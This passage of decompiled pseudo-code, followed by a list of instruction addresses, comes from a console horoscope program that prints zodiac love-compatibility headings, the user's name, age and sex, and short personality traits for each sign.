																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("CAPRICORN AND AQUARIUS LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x49;
																				E013D1B90(__ebx, 0x49, __edi) = _a4;
																				_push(_a4);
																				_push(__esi);
																				_push(__ebx);
																				_push(__edi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																			case 0x11:
																				L124:
																				E013DB418(__ebx, __edx, __eflags, "cls") = E013D1A50();
																				__ecx = _a4;
																				__edx = __esi;
																				__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a4, __ebx);
																				_push("CAPRICORN AND PISCES LOVE COMPATIBILITY");
																				 *0x13fe250 = 0x80005;
																				__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																				__edx = 0x4a;
																				__eax = E013D1B90(__ebx, 0x4a, __edi);
																				__ecx = _a4;
																				_push(_a4);
																				_push(__esi);
																				_push(__ebx);
																				_push(__edi);
																				L97();
																				__esp = 0x20 + __esp;
																				goto L126;
																		}
																		L126:
																		__eax = E013DB418(__ebx, __edx, __eflags, "cls");
																		_push(__esi);
																		_push("Name: %s");
																		 *0x13fe250 = 0x30037;
																		E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v32;
																		_push(_v32);
																		_push("Age=%d");
																		 *0x13fe250 = 0x40037;
																		E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = _v36;
																		 *0x13fe250 = 0x50037;
																		_push(E013DC111(_v36));
																		_push("Sex=%c");
																		__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																		__esp = 0x20 + __esp;
																		__eax = E013D1A50();
																		_v48 = "\n*  You are usually ambitious.";
																		_v44 = "\n*  You marked by a purposeful pursuit of your destiny.";
																		_v40 = "\n*  You have a sense of purpose and a great faith in your own ability.";
																		__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
																		__eax = __eax - 1;
																		__eflags = __eax - 5;
																	} while (__eflags <= 0);
																	_pop(__edi);
																	goto L128;
																}
																goto L336;
															case 6:
																L81:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																_push("SAGGITARIUS AND ARIES LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 8;
																__eax = E013D1B90(__ebx, 8, __edi);
																__edx = _v4;
																_push(__ebx);
																_push(__esi);
																_push(__edi);
																_push(__edx);
																L66();
																__esp = 0x20 + __esp;
																goto L94;
															case 7:
																L82:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																_push("SAGGITARIUS AND TAURUS LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x13;
																__eax = E013D1B90(__ebx, 0x13, __edi);
																__edx = _v4;
																_push(__ebx);
																_push(__esi);
																_push(__edi);
																_push(__edx);
																L66();
																__esp = 0x20 + __esp;
																goto L94;
															case 8:
																L83:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																_push("SAGGITARIUS AND GEMINI LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x1d;
																__eax = E013D1B90(__ebx, 0x1d, __edi);
																__edx = _v4;
																_push(__ebx);
																_push(__esi);
																_push(__edi);
																_push(__edx);
																L66();
																__esp = 0x20 + __esp;
																goto L94;
															case 9:
																L84:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																_push("SAGGITARIUS AND CANCER LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x26;
																__eax = E013D1B90(__ebx, 0x26, __edi);
																__edx = _v4;
																_push(__ebx);
																_push(__esi);
																_push(__edi);
																_push(__edx);
																L66();
																__esp = 0x20 + __esp;
																goto L94;
															case 0xa:
																L85:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																_push("SAGGITARIUS AND LEO LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x2e;
																__eax = E013D1B90(__ebx, 0x2e, __edi);
																__edx = _v4;
																_push(__ebx);
																_push(__esi);
																_push(__edi);
																_push(__edx);
																L66();
																__esp = 0x20 + __esp;
																goto L94;
															case 0xb:
																L86:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																_push("SAGGITARIUS AND VIRGO LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x35;
																__eax = E013D1B90(__ebx, 0x35, __edi);
																__edx = _v4;
																_push(__ebx);
																_push(__esi);
																_push(__edi);
																_push(__edx);
																L66();
																__esp = 0x20 + __esp;
																goto L94;
															case 0xc:
																L87:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																_push("SAGGITARIUS AND LIBRA LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x3b;
																__eax = E013D1B90(__ebx, 0x3b, __edi);
																__edx = _v4;
																_push(__ebx);
																_push(__esi);
																_push(__edi);
																_push(__edx);
																L66();
																__esp = 0x20 + __esp;
																goto L94;
															case 0xd:
																L88:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																_push("SAGGITARIUS AND SCORPIO LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x40;
																__eax = E013D1B90(__ebx, 0x40, __edi);
																__edx = _v4;
																_push(__ebx);
																_push(__esi);
																_push(__edi);
																_push(__edx);
																L66();
																__esp = 0x20 + __esp;
																goto L94;
															case 0xe:
																L89:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																_push("SAGGITARIUS AND SAGGITARIUS LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x44;
																__eax = E013D1B90(__ebx, 0x44, __edi);
																__edx = _v4;
																_push(__ebx);
																_push(__esi);
																_push(__edi);
																_push(__edx);
																L66();
																__esp = 0x20 + __esp;
																goto L94;
															case 0xf:
																L90:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																_push("SAGGITARIUS AND CAPRICORN LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x45;
																__eax = E013D1B90(__ebx, 0x45, __edi);
																__edx = _v4;
																_push(__ebx);
																_push(__esi);
																_push(__edi);
																_push(__edx);
																L66();
																__esp = 0x20 + __esp;
																goto L94;
															case 0x10:
																L91:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																_push("SAGGITARIUS AND AQUARIUS LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x46;
																__eax = E013D1B90(__ebx, 0x46, __edi);
																__edx = _v4;
																_push(__ebx);
																_push(__esi);
																_push(__edi);
																_push(__edx);
																L66();
																__esp = 0x20 + __esp;
																goto L94;
															case 0x11:
																L92:
																E013DB418(__ebx, __edx, __eflags, "cls") = E013D19D0();
																__edx = __esi;
																__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
																_push("SAGGITARIUS AND PISCES LOVE COMPATIBILITY");
																 *0x13fe250 = 0x80005;
																__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
																__edx = 0x47;
																__eax = E013D1B90(__ebx, 0x47, __edi);
																__edx = _v4;
																_push(__ebx);
																_push(__esi);
																_push(__edi);
																_push(__edx);
																L66();
																__esp = 0x20 + __esp;
																goto L94;
														}
														L94:
														__eax = E013DB418(__ebx, __edx, __eflags, "cls");
														_push(__esi);
														_push("Name: %s");
														 *0x13fe250 = 0x30037;
														__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
														__ecx = _v24;
														_push(_v24);
														_push("Age=%d");
														 *0x13fe250 = 0x40037;
														E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = __bl;
														 *0x13fe250 = 0x50037;
														_push(E013DC111(__bl));
														_push("Sex=%c");
														__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
														__esp = 0x20 + __esp;
														__eax = E013D19D0();
														_v32 = "\n*  You have an appetite for learning and travel.";
														_v28 = "\n*  You prefer to be footloose and fancy free.";
														__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
														__eax = __eax - 1;
														__eflags = __eax - 5;
													} while (__eflags <= 0);
													goto L95;
												}
												goto L336;
											case 6:
												L50:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("SCORPIUS AND ARIES LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 7;
												__eax = E013D1B90(__ebx, 7, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L35();
												__esp = 0x20 + __esp;
												goto L63;
											case 7:
												L51:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("SCORPIUS AND TAURUS LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x12;
												__eax = E013D1B90(__ebx, 0x12, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L35();
												__esp = 0x20 + __esp;
												goto L63;
											case 8:
												L52:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("SCORPIUS AND GEMINI LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x1c;
												__eax = E013D1B90(__ebx, 0x1c, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L35();
												__esp = 0x20 + __esp;
												goto L63;
											case 9:
												L53:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("SCORPIUS AND CANCER LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x25;
												__eax = E013D1B90(__ebx, 0x25, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L35();
												__esp = 0x20 + __esp;
												goto L63;
											case 0xa:
												L54:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("SCORPIUS AND LEO LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x2d;
												__eax = E013D1B90(__ebx, 0x2d, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L35();
												__esp = 0x20 + __esp;
												goto L63;
											case 0xb:
												L55:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("SCORPIUS AND VIRGO LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x34;
												__eax = E013D1B90(__ebx, 0x34, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L35();
												__esp = 0x20 + __esp;
												goto L63;
											case 0xc:
												L56:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("SCORPIUS AND LIBRA LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x3a;
												__eax = E013D1B90(__ebx, 0x3a, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L35();
												__esp = 0x20 + __esp;
												goto L63;
											case 0xd:
												L57:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("SCORPIUS AND SCORPIO LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x3f;
												__eax = E013D1B90(__ebx, 0x3f, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L35();
												__esp = 0x20 + __esp;
												goto L63;
											case 0xe:
												L58:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("SCORPIUS AND SAGGITARIUS LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x43;
												__eax = E013D1B90(__ebx, 0x43, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L35();
												__esp = 0x20 + __esp;
												goto L63;
											case 0xf:
												L59:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("SCORPIUS AND CAPRICORN LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x44;
												__eax = E013D1B90(__ebx, 0x44, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L35();
												__esp = 0x20 + __esp;
												goto L63;
											case 0x10:
												L60:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("SCORPIUS AND AQUARIUS LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x45;
												__eax = E013D1B90(__ebx, 0x45, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L35();
												__esp = 0x20 + __esp;
												goto L63;
											case 0x11:
												L61:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1940();
												__edx = __esi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, __ebx, __edi);
												_push("SCORPIUS AND PISCES LOVE COMPATIBILITY");
												 *0x13fe250 = 0xa0005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x46;
												__eax = E013D1B90(__ebx, 0x46, __edi);
												__edx = _v0;
												_push(__ebx);
												_push(__esi);
												_push(__edi);
												_push(__edx);
												L35();
												__esp = 0x20 + __esp;
												goto L63;
										}
										L63:
										__eax = E013DB418(__ebx, __edx, __eflags, "cls");
										_push(__esi);
										_push("Name: %s");
										 *0x13fe250 = 0x30037;
										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
										__ecx = _v20;
										_push(_v20);
										_push("Age=%d");
										 *0x13fe250 = 0x40037;
										E013DB9F5(__ebx, __edx, __edi, __esi, __eflags) = __bl;
										 *0x13fe250 = 0x50037;
										_push(E013DC111(__bl));
										_push("Sex=%c");
										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
										__esp = 0x20 + __esp;
										__eax = E013D1940();
										_v28 = "\n*  You are usually filled with inherent contradiction.";
										_v24 = "\n*  You generally become interested in occult matters.";
										__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
										__eax = __eax - 1;
										__eflags = __eax - 5;
									} while (__eflags <= 0);
									goto L64;
								}
								goto L336;
							case 6:
								L17:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
								__eax = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("LIBRA AND ARIES LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 6;
								E013D1B90(__ebx, 6, __edi) = _a16;
								__eax = E013D5310(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L30;
							case 7:
								L18:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
								__ecx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("LIBRA AND TAURUS LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x11;
								__eax = E013D1B90(__ebx, 0x11, __edi);
								__ecx = _a16;
								__eax = E013D5310(__ebx, _a16, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L30;
							case 8:
								L19:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
								__edx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("LIBRA AND GEMINI LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x1b;
								__eax = E013D1B90(__ebx, 0x1b, __edi);
								__edx = _a16;
								__eax = E013D5310(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L30;
							case 9:
								L20:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
								__eax = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("LIBRA AND CANCER LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x24;
								E013D1B90(__ebx, 0x24, __edi) = _a16;
								__eax = E013D5310(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L30;
							case 0xa:
								L21:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
								__ecx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("LIBRA AND LEO LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x2c;
								__eax = E013D1B90(__ebx, 0x2c, __edi);
								__ecx = _a16;
								__eax = E013D5310(__ebx, _a16, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L30;
							case 0xb:
								L22:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
								__edx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("LIBRA AND VIRGO LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x33;
								__eax = E013D1B90(__ebx, 0x33, __edi);
								__edx = _a16;
								__eax = E013D5310(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L30;
							case 0xc:
								L23:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
								__eax = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("LIBRA AND LIBRA LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x39;
								E013D1B90(__ebx, 0x39, __edi) = _a16;
								__eax = E013D5310(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L30;
							case 0xd:
								L24:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
								__ecx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("LIBRA AND SCORPIO LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x3a;
								__eax = E013D1B90(__ebx, 0x3a, __edi);
								__ecx = _a16;
								__eax = E013D5310(__ebx, _a16, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L30;
							case 0xe:
								L25:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
								__edx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("LIBRA AND SAGGITARIUS LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x3b;
								__eax = E013D1B90(__ebx, 0x3b, __edi);
								__edx = _a16;
								__eax = E013D5310(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L30;
							case 0xf:
								L26:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
								__eax = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("LIBRA AND CAPRICORN LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x3c;
								E013D1B90(__ebx, 0x3c, __edi) = _a16;
								__eax = E013D5310(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L30;
							case 0x10:
								L27:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
								__ecx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("LIBRA AND AQUARIUS LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x3d;
								__eax = E013D1B90(__ebx, 0x3d, __edi);
								__ecx = _a16;
								__eax = E013D5310(__ebx, _a16, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L30;
							case 0x11:
								L28:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D18E0();
								__edx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("LIBRA AND PISCES LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x3e;
								__eax = E013D1B90(__ebx, 0x3e, __edi);
								__edx = _a16;
								__eax = E013D5310(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L30;
						}
						L30:
						E013DB418(_t662, _t673, _t696, "cls");
						_push(_t681);
						_push("Name: %s");
						 *0x13fe250 = 0x30037;
						E013DB9F5(_t662, _t673, _t679, _t681, _t696);
						_push(_v20);
						_push("Age=%d");
						 *0x13fe250 = 0x40037;
						E013DB9F5(_t662, _t673, _t679, _t681, _t696);
						 *0x13fe250 = 0x50037;
						_push(E013DC111(_v24));
						_push("Sex=%c");
						E013DB9F5(_t662, _t673, _t679, _t681, _t696);
						_push("Your horoscope sign is Libra-The Balance");
						 *0x13fe250 = 0x20003;
						E013DB9F5(_t662, _t673, _t679, _t681, _t696);
						_push("__");
						 *0x13fe250 = 0x3000a;
						E013DB9F5(_t662, _t673, _t679, _t681, _t696);
						_push("___.\'  \'.___");
						 *0x13fe250 = 0x40005;
						E013DB9F5(_t662, _t673, _t679, _t681, _t696);
						_push("____________\n\n");
						 *0x13fe250 = 0x50005;
						E013DB9F5(_t662, _t673, _t679, _t681, _t696);
						_t686 = _t689 + 0x30;
						_v36 = "\n*  You are rarely lazy.";
						_v32 = "\n*  You work hard, and also demand that your partners work just as hard.";
						_v28 = "\n*  You have a strong sense of justice and fair play.";
						_t626 = E013D1C60(_t662, _v24, _t679, _t681, _t696) - 1;
						_t697 = _t626 - 5;
					} while (_t626 <= 5);
					_pop(_t678);
					goto L32;
				}
				L336:
			}





















































                                                                          0x013d5310
                                                                          0x013d5310
                                                                          0x013d5310
                                                                          0x013d5316
                                                                          0x013d5317
                                                                          0x013d531d
                                                                          0x013d5322
                                                                          0x013d5325
                                                                          0x013d5326
                                                                          0x013d532b
                                                                          0x013d5335
                                                                          0x013d533a
                                                                          0x013d5344
                                                                          0x013d5345
                                                                          0x013d534a
                                                                          0x013d5354
                                                                          0x013d5357
                                                                          0x013d5361
                                                                          0x013d536b
                                                                          0x013d5373
                                                                          0x013d5374
                                                                          0x013d5379
                                                                          0x013d537e
                                                                          0x013d5383
                                                                          0x013d538d
                                                                          0x013d5392
                                                                          0x013d5397
                                                                          0x013d53a1
                                                                          0x013d53a6
                                                                          0x013d53ab
                                                                          0x013d53b5
                                                                          0x013d53ba
                                                                          0x013d53bf
                                                                          0x013d53c9
                                                                          0x013d53ce
                                                                          0x013d53d1
                                                                          0x013d53d8
                                                                          0x013d53df
                                                                          0x013d53eb
                                                                          0x013d53ef
                                                                          0x013d5a95
                                                                          0x013d5a9a
                                                                          0x013d5aad
                                                                          0x013d53f5
                                                                          0x013d53f5
                                                                          0x013d53f6
                                                                          0x013d5400
                                                                          0x013d5400
                                                                          0x00000000
                                                                          0x013d540c
                                                                          0x013d5418
                                                                          0x013d541d
                                                                          0x013d5422
                                                                          0x013d5427
                                                                          0x013d5431
                                                                          0x013d5436
                                                                          0x013d5439
                                                                          0x013d5446
                                                                          0x013d5467
                                                                          0x013d546a
                                                                          0x013d5448
                                                                          0x013d5460
                                                                          0x013d5462
                                                                          0x013d5462
                                                                          0x013d546e
                                                                          0x013d5470
                                                                          0x013d5477
                                                                          0x013d5477
                                                                          0x013d547a
                                                                          0x013d547f
                                                                          0x013d5481
                                                                          0x013d5485
                                                                          0x013d548c
                                                                          0x013d5490
                                                                          0x013d5490
                                                                          0x013d5494
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d549b
                                                                          0x013d549c
                                                                          0x013d54a1
                                                                          0x013d54a6
                                                                          0x013d54ab
                                                                          0x013d54b0
                                                                          0x013d54b3
                                                                          0x013d54b8
                                                                          0x013d54bb
                                                                          0x013d54c5
                                                                          0x013d54c8
                                                                          0x013d54c9
                                                                          0x013d54cc
                                                                          0x013d54cf
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d54cf
                                                                          0x013d54d1
                                                                          0x013d54d6
                                                                          0x013d54db
                                                                          0x013d54e0
                                                                          0x013d54e5
                                                                          0x013d54e8
